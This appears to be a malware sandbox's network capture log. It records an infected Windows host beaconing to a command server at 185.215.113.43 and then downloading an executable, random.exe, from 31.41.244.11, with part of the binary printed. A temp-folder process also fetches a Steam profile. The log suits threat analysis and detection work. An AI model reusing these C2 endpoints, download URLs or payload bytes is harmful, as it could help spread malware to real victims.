Dec 16, 2024 11:08:35.458029032 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.5	50304	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:08:37.685877085 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:08:39.016581059 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:08:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.5	50305	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:08:40.661153078 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:08:41.999046087 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:08:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.5	50306	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:08:43.735909939 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:08:45.065433979 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:08:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.5	50307	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:08:46.692228079 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:08:48.046264887 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:08:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.5	50308	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:08:49.788497925 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:08:51.130388975 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:08:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.5	50309	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:08:52.764914989 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:08:54.317023993 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:08:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.5	50310	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:08:56.063117981 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:08:57.397957087 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:08:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.5	50311	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:08:59.034946918 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:09:00.372850895 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:09:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.5	50312	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:09:02.111701965 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:09:03.453321934 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:09:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.5	50313	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:09:05.086369038 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:09:06.436537027 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:09:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.5	50314	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:09:08.182965994 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:09:09.514897108 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:09:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.5	50315	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:09:11.156469107 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:09:12.494751930 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:09:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.5	50316	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:09:14.233083010 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:09:15.581387043 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:09:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.5	50317	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:09:17.206723928 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:09:18.547199965 CET	299	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:09:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 64 0d 0a 20 3c 63 3e 31 30 31 36 30 34 39 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 39 36 61 38 30 35 31 34 35 62 30 30 32 61 62 35 65 34 35 34 32 35 31 39 37 64 31 61 61 31 64 61 61 61 38 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d <c>1016049001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc96a805145b002ab5e45425197d1aa1daaa8#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.5	50318	31.41.244.11	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:09:18.671442032 CET	62	OUT	GET /files/burpin1/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 16, 2024 11:09:19.996366978 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:09:19 GMT Content-Type: application/octet-stream Content-Length: 4438776 Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT Connection: keep-alive ETag: "675784f0-43baf8" Accept-Ranges: bytes Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ`@`!L!Require Windows$PEL?O_@D0O{C?l.text `.rdata;<@@.dataM@.rsrcO0P@@U`AS3;VWtf9bAt`APPPYnj'@uv=A6PP9^]v8^3hAPPPxAEE;FrP~Y6jtAt$DV%sAF8^jqA39`At@9D$tt$Ph5XAA3D$`\|$u@3pAt$D$t$`A/@t$PQ%`A3T$L$fAABBfuL$3f9t@f<Aut$TAL$%S\$VC;^tLW3
Dec 16, 2024 11:09:19.996392965 CET	1236	IN	Data Raw: c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 94 80 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 68 80 01 00 59 8b 46 04 89 3e 66 83 24 47 00 89 5e 08 5f 5e 5b c2 04 00 56 8b f1 Data Ascii: jZQ39FY~9F~fAfG@;F\|6hYF>f$G^_^[Vv\IY^oUQQAuVjjEP5A\|At>E;Ew6rE;Es,jPYYtlAj@ AEPjh5XAA3D$tlA
Dec 16, 2024 11:09:19.996402979 CET	448	IN	Data Raw: 3b f3 74 06 8b 06 56 ff 50 08 33 c0 40 eb 25 e8 a7 fe ff ff 8d 4d e0 8b f8 e8 bb 0e 01 00 8b 06 56 ff 50 08 8b c7 eb 0c 3b f3 74 06 8b 06 56 ff 50 08 33 c0 5e 5f 5b c9 c3 56 8b f1 c7 46 04 60 c3 41 00 83 66 08 00 c7 06 34 a5 41 00 c7 46 04 24 a5 Data Ascii: ;tVP3@%MVP;tVP3^_[VF`Af4AF$AfNf$N(^Uh$AuYYtEP#UPQ3hAudYYu@]Vv({F$YtPQvzvYtVP^l$
Dec 16, 2024 11:09:19.996409893 CET	1236	IN	Data Raw: 56 8b f1 8d 4e 08 c7 06 58 a5 41 00 e8 fa 0a 01 00 f6 44 24 08 01 74 07 56 e8 f1 79 01 00 59 8b c6 5e c2 04 00 55 8b ec 51 56 57 ff 75 08 8b f1 8d 4e 0c e8 26 1e 01 00 ff 75 0c 8d 7e 10 8b cf e8 63 fb ff ff 6a 5c 8b cf e8 ec fe ff ff 33 ff 8d 45 Data Ascii: VNXAD$tVyY^UQVWuN&u~cj\3EPWVh<@WW5dA=lAA=AhAtsj5hAAlA;=XAt2t!ttg~k~}PjKjjjW\|YYd9=`Au\EP5hAAMt;u
Dec 16, 2024 11:09:19.996416092 CET	1236	IN	Data Raw: 48 08 89 78 10 89 78 14 e8 2c 07 01 00 84 c0 0f 85 b0 00 00 00 ff 15 98 a1 41 00 53 8d 4d e4 89 45 08 e8 7b f6 ff ff 8d 45 e4 50 e8 5e 16 00 00 3b c7 59 7d 3b ff 75 08 8b 06 6a 6a 56 ff 50 20 ff 75 e4 8b f0 e8 f1 74 01 00 8b 45 0c 3b c7 59 74 06 Data Ascii: Hxx,ASME{EP^;Y};ujjVP utE;YtPQMutYMf<AuE6YujhVPF jSHxxuAPjjVS uwtYuMVEM0g#E8>AP
Dec 16, 2024 11:09:19.996419907 CET	1236	IN	Data Raw: 6a 18 ff 75 08 ff 15 40 a0 41 00 57 53 ff 75 d8 ff d6 57 53 ff 75 dc 89 45 f4 ff d6 ff 75 fc 8b 35 18 a0 41 00 89 45 f8 ff d6 ff 75 fc 8b d8 ff d6 ff 75 08 8b 35 38 a0 41 00 53 8b f8 ff d6 ff 75 f8 89 45 f0 ff 75 f4 ff 75 fc ff 15 34 a0 41 00 50 Data Ascii: ju@AWSuWSuEu5AEuu58ASuEuu4APWjWE<Ah u3uPPSuuPPW,AjW(AuESuW5$ASWujAEuWAWWWWuTA_^[UhSVWj@EPuA-h
Dec 16, 2024 11:09:19.996426105 CET	1236	IN	Data Raw: 83 25 84 e9 41 00 00 c3 83 25 84 e9 41 00 00 68 60 a6 41 00 68 c4 a5 41 00 ff 15 68 a1 41 00 50 ff 15 6c a1 41 00 85 c0 74 11 68 88 e9 41 00 ff d0 c7 05 84 e9 41 00 01 00 00 00 c3 56 8b 74 24 08 85 f6 75 05 33 c0 40 5e c3 e8 3f ff ff ff 83 f8 09 Data Ascii: %A%Ah`AhAhAPlAthAAVt$u3@^?uuu@;t3^US3EPSSSSSSh j jEP]]]]]]]EAtEPuSAuAE[UEVpEtKQ;SW}=3~'4<
Dec 16, 2024 11:09:19.996680021 CET	896	IN	Data Raw: 5e c2 04 00 53 56 8b f1 8b 06 33 db 57 8b 7c 24 10 89 5e 04 88 18 38 1f 74 07 43 80 3c 3b 00 75 f9 53 e8 33 fc ff ff 8b 06 8a 0f 88 08 40 47 84 c9 75 f6 5f 89 5e 04 8b c6 5e 5b c2 04 00 56 57 8b 7c 24 0c 8b f1 3b fe 74 25 83 66 04 00 8b 06 c6 00 Data Ascii: ^SV3W\|$^8tC<;uS3@Gu_^^[VW\|$;t%fw@AuGF_^Vj&NT$FF^SVW\|$38tC<;uSF@Gu^_^[VW\|$wF@A
Dec 16, 2024 11:09:19.996690989 CET	1236	IN	Data Raw: 89 5d f0 eb 03 8b 7d 08 8b 07 8d 4d e4 51 b9 00 10 00 00 2b ce 51 8d 8c 35 e0 ef ff ff 51 57 ff 50 0c 85 c0 0f 85 ca 00 00 00 8b 45 e4 3b c3 0f 84 bf 00 00 00 03 f0 8d 85 e0 ef ff ff 33 ff 89 45 f8 38 5d ff 8b c6 74 3d 2b 45 e8 3b f8 77 60 ff 75 Data Ascii: ]}MQ+Q5QWPE;3E8]t=+E;w`uuubE:EtuMvGE+E;w#uuubuEEE+}V=]PP<A9]w}"M39Y
Dec 16, 2024 11:09:19.996701956 CET	1236	IN	Data Raw: 01 50 50 8b cf e8 97 f6 ff ff 50 ff 74 24 18 ff 15 c4 a2 41 00 8b 07 66 83 24 70 00 89 77 04 8b c7 5f 5e c3 55 8b ec 83 ec 74 53 56 8b 75 08 57 6a 40 8d 45 8c 50 56 ff 15 9c a2 41 00 85 c0 74 49 68 f8 a5 41 00 8d 45 8c 50 ff 15 48 a1 41 00 85 c0 Data Ascii: PPPt$Af$pw_^UtSVuWj@EPVAtIhAEPHAu6jV\|Au)EVPvjhAutu]Y3_^[VA3;EthAhAEPVYYVAhAE+ESSWuPE+EPuuhPhAh
Dec 16, 2024 11:09:20.116668940 CET	1236	IN	Data Raw: 04 46 89 75 fc 68 e9 fd 00 00 8d 45 e0 50 8d 45 bc 50 e8 e4 f4 ff ff 83 c4 0c 50 8d 4d b0 e8 46 db ff ff ff 75 bc e8 6c 59 01 00 8d 45 b0 50 e8 c5 f7 ff ff 59 59 68 c4 a6 41 00 ff 75 a4 ff 15 24 a1 41 00 85 c0 75 14 6a 3d ff 75 b0 e8 6e ed 00 00 Data Ascii: FuhEPEPPMFulYEPYYhAu$Auj=unYY39AAt&6AP6u4At9u9u Suu;tuHMEP?MM!iuX+uuuuW

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49811	23.37.186.133	443	6464	C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:03:20 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-16 10:03:21 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Mon, 16 Dec 2024 10:03:21 GMT Content-Length: 35131 Connection: close Set-Cookie: sessionid=f41de79c63eef3cc7e82792b; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
